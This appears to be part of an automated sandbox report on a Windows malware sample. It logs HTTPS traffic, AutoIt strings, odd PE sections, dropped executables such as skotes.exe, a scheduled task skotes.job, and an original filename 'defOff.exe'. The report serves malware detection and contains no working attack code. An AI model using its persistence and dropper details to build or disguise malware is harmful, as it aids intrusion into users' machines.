Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 58663 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58618 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58692
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58691
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58693
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58690
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 58709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58629 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58616
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58618
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58617
Source: unknown Network traffic detected: HTTP traffic on port 58687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58621
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58620
Source: unknown Network traffic detected: HTTP traffic on port 58641 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58627
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58629
Source: unknown Network traffic detected: HTTP traffic on port 58647 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58623
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58624
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58631
Source: unknown Network traffic detected: HTTP traffic on port 58658 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58623 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58641
Source: unknown Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58640
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58643
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58642
Source: unknown Network traffic detected: HTTP traffic on port 58617 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58659 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58653 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58649
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58645
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58644
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58647
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58652
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58651
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58654
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58653
Source: unknown Network traffic detected: HTTP traffic on port 58642 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58631 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58654 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 58708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58708
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58700
Source: unknown Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58665 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58616 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 58627 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58720
Source: unknown Network traffic detected: HTTP traffic on port 58643 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58649 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58616 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58618 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58620 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58621 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58623 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58624 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58627 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58629 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58645 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:58647 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58652 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58659 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58658 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:58684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58686 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58691 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:58690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:58693 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:58709 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 275df0ca27.exe, 0000000C.00000002.2617209511.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_31ee3440-3
Source: 275df0ca27.exe, 0000000C.00000002.2617209511.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f670f2b3-d
Source: 275df0ca27.exe, 00000021.00000000.2706701885.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d581d412-5
Source: 275df0ca27.exe, 00000021.00000000.2706701885.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_58e133eb-a
Source: 275df0ca27.exe.8.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_94b37426-1
Source: 275df0ca27.exe.8.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ed59cb9f-5
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name:
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: .idata
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: .idata
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name:
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name: .rsrc
Source: 1171a5b648.exe.8.dr Static PE information: section name: .idata
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name:
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: .idata
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name:
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: .idata
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: .idata
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C33CC 0_3_011C33CC
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.1833557458.000000000610B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1829932246.0000000005FD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1829378006.0000000005FB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1844804963.0000000005A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822773942.0000000005F71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1839884561.0000000005EB3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830752547.0000000005FC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1831200048.0000000005FC7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1837474966.0000000005EBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1844921816.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830131735.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1839064591.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824409491.0000000005EBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1832009242.0000000005EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1832707028.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818523624.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1827304318.000000000609F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824803775.0000000005F86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821065577.0000000005EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822533398.0000000006021000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823887555.0000000005F77000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824670644.0000000005EBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1844519001.0000000005AD2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824148855.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830989761.0000000005EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1835952635.0000000005FED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1827580775.0000000005EBD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825343914.0000000006067000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821707262.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822069091.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1826848878.0000000005EB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828024267.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818690139.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1836245679.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821523631.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824019118.0000000006039000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1832914072.0000000005EB3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1836541964.0000000005FF1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1829587604.00000000060BD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828532029.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828640336.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830464243.0000000005EBD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825475875.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828952693.0000000005FB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825210589.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
